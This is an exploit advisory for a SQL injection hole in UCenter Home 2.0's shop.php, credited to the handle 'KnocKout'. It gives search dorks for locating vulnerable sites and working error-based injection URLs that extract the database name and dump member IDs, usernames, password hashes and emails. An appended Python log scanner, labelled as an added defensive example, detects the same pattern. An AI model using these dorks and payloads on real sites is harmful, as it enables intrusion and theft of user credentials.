__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerability Type : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
You need the victim database name.
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
..
DB : Okay.
Edit the DB name : `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'
Edit : Okay.
Use hex conversion and edit your SQL injection exploit.
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
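
A defender-side check for the request pattern shown above, as an added example that is not part of the original advisory: it scans web access-log lines for `shop.php` requests whose `shopid` is not a plain integer and tags the error-based markers seen in the injection string. The log format, the sample lines, and the function and marker names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Markers of the MySQL error-based pattern shown in this advisory (names are illustrative).
MARKERS = {
    "duplicate-key trick": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "schema enumeration": re.compile(r"information_schema", re.I),
    "group-by collision": re.compile(r"group\s+by", re.I),
    "hex literal": re.compile(r"\b0x[0-9a-f]{2,}", re.I),
    "subselect": re.compile(r"\(\s*select\b", re.I),
}
# Request field of a combined-format access log (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S.*?) HTTP/[\d.]+"')

def inspect_request(log_line):
    """Return (verdict, markers): 'ignore' (not shop.php), 'ok' (numeric shopid),
    'suspicious' (non-numeric shopid) or 'sqli' (error-based markers present)."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return "ignore", []
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/shop.php"):
        return "ignore", []
    # parse_qs URL-decodes the value, so %20 and + both become spaces.
    values = parse_qs(url.query, keep_blank_values=True).get("shopid", [])
    bad = [v for v in values if not re.fullmatch(r"[0-9]+", v)]
    if not bad:
        return "ok", []
    hits = sorted(name for name, rx in MARKERS.items()
                  if any(rx.search(v) for v in bad))
    return ("sqli" if hits else "suspicious"), hits

def scan(lines):
    """Return (line_number, verdict, markers) for every line worth triage."""
    results = [(n, *inspect_request(line)) for n, line in enumerate(lines, 1)]
    return [r for r in results if r[1] in ("suspicious", "sqli")]

SAMPLE_LOG = [  # constructed lines, not taken from a real server
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:01 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201'
    '%20from(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables'
    '%20group%20by%20x)a) HTTP/1.1" 200 812',
    '203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /shop.php?ac=view&shopid=25a HTTP/1.1" 200 100',
    '198.51.100.4 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?id=1 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for line_no, verdict, hits in scan(SAMPLE_LOG):
        print(line_no, verdict, ", ".join(hits))
```

The same integer-only rule, enforced in the application before `shopid` reaches the query, is what closes the injection point; the log check only finds past attempts.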